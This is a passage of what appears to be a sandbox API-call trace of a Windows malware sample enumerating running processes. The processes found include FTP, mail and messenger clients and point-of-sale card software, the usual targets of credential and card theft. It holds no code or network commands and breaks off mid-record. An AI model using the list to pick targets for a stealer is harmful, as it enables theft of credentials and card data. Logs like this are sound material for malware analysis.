(dwMilliseconds=0xa) [0205.972] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.972] Sleep (dwMilliseconds=0xa) [0205.987] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.988] Sleep (dwMilliseconds=0xa) [0206.008] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.010] Sleep (dwMilliseconds=0xa) [0206.026] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.027] Sleep (dwMilliseconds=0xa) [0206.050] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x478, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.051] Sleep (dwMilliseconds=0xa) [0206.068] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.069] Sleep (dwMilliseconds=0xa) [0206.081] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0206.082] Sleep (dwMilliseconds=0xa) [0206.097] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x614, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0206.098] Sleep (dwMilliseconds=0xa) [0206.113] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.114] Sleep (dwMilliseconds=0xa) [0206.138] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x734, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.139] Sleep (dwMilliseconds=0xa) [0206.159] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0206.160] Sleep (dwMilliseconds=0xa) [0206.176] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0206.177] Sleep (dwMilliseconds=0xa) [0206.192] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0206.193] Sleep (dwMilliseconds=0xa) [0206.206] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0206.207] Sleep (dwMilliseconds=0xa) [0206.222] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.223] Sleep (dwMilliseconds=0xa) [0206.237] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0206.238] Sleep (dwMilliseconds=0xa) [0206.256] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0206.257] Sleep (dwMilliseconds=0xa) [0206.277] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.278] Sleep (dwMilliseconds=0xa) [0206.302] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0206.303] Sleep (dwMilliseconds=0xa) [0206.318] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baby shoulder.exe")) returned 1 [0206.319] Sleep (dwMilliseconds=0xa) [0206.332] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="responsibilitywaitscene.exe")) returned 1 [0206.333] Sleep (dwMilliseconds=0xa) [0206.347] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wonder prepare maintain.exe")) returned 1 [0206.348] Sleep (dwMilliseconds=0xa) [0206.362] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-job.exe")) returned 1 [0206.363] Sleep (dwMilliseconds=0xa) [0206.381] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="season lead space.exe")) returned 1 [0206.382] Sleep (dwMilliseconds=0xa) [0206.397] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="past magazine.exe")) returned 1 [0206.398] Sleep (dwMilliseconds=0xa) [0206.409] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="apply.exe")) returned 1 [0206.410] Sleep (dwMilliseconds=0xa) [0206.425] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="since.exe")) returned 1 [0206.426] Sleep (dwMilliseconds=0xa) [0206.445] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="some.exe")) returned 1 [0206.445] Sleep (dwMilliseconds=0xa) [0206.456] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="issue.exe")) returned 1 [0206.457] Sleep (dwMilliseconds=0xa) [0206.472] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wind.exe")) returned 1 [0206.473] Sleep (dwMilliseconds=0xa) [0206.487] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="box mission.exe")) returned 1 [0206.488] Sleep (dwMilliseconds=0xa) [0206.504] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="happen_form.exe")) returned 1 [0206.505] Sleep (dwMilliseconds=0xa) [0206.519] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="weightwithoutmight.exe")) returned 1 [0206.519] Sleep (dwMilliseconds=0xa) [0206.549] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="one_police_focus.exe")) returned 1 [0206.551] Sleep (dwMilliseconds=0xa) [0206.565] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0206.566] Sleep (dwMilliseconds=0xa) [0206.581] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0206.582] Sleep (dwMilliseconds=0xa) [0206.598] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0206.599] Sleep (dwMilliseconds=0xa) [0206.612] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0206.613] Sleep (dwMilliseconds=0xa) [0206.628] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0206.629] Sleep (dwMilliseconds=0xa) [0206.644] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0206.644] Sleep (dwMilliseconds=0xa) [0206.664] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0206.665] Sleep (dwMilliseconds=0xa) [0206.691] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0206.692] Sleep (dwMilliseconds=0xa) [0206.706] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0206.707] Sleep (dwMilliseconds=0xa) [0206.722] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0206.723] Sleep (dwMilliseconds=0xa) [0206.754] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0206.755] Sleep (dwMilliseconds=0xa) [0206.769] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0206.771] Sleep (dwMilliseconds=0xa) [0206.793] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0206.795] Sleep (dwMilliseconds=0xa) [0206.816] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0206.818] Sleep (dwMilliseconds=0xa) [0206.831] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0206.832] Sleep (dwMilliseconds=0xa) [0206.847] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0206.848] Sleep (dwMilliseconds=0xa) [0206.884] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0206.885] Sleep (dwMilliseconds=0xa) [0206.909] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0206.910] Sleep (dwMilliseconds=0xa) [0206.925] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0206.926] Sleep (dwMilliseconds=0xa) [0206.942] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0206.943] Sleep (dwMilliseconds=0xa) [0206.956] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0206.957] Sleep (dwMilliseconds=0xa) [0206.971] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xea4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0206.973] Sleep (dwMilliseconds=0xa) [0206.989] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0206.990] Sleep (dwMilliseconds=0xa) [0207.004] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0207.005] Sleep (dwMilliseconds=0xa) [0207.019] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0207.020] Sleep (dwMilliseconds=0xa) [0207.034] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0207.035] Sleep (dwMilliseconds=0xa) [0207.050] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0207.051] Sleep (dwMilliseconds=0xa) [0207.067] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0207.068] Sleep (dwMilliseconds=0xa) [0207.081] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0207.083] Sleep (dwMilliseconds=0xa) [0207.097] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0207.098] Sleep (dwMilliseconds=0xa) [0207.115] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0207.116] Sleep (dwMilliseconds=0xa) [0207.136] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0207.137] Sleep (dwMilliseconds=0xa) [0207.159] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0207.161] Sleep (dwMilliseconds=0xa) [0207.177] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0207.178] Sleep (dwMilliseconds=0xa) [0207.206] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0207.207] Sleep (dwMilliseconds=0xa) [0207.222] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0207.223] Sleep (dwMilliseconds=0xa) [0207.237] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0207.239] Sleep (dwMilliseconds=0xa) [0207.254] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0207.255] Sleep (dwMilliseconds=0xa) [0207.269] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0207.270] Sleep (dwMilliseconds=0xa) [0207.284] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0207.285] Sleep (dwMilliseconds=0xa) [0207.301] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, 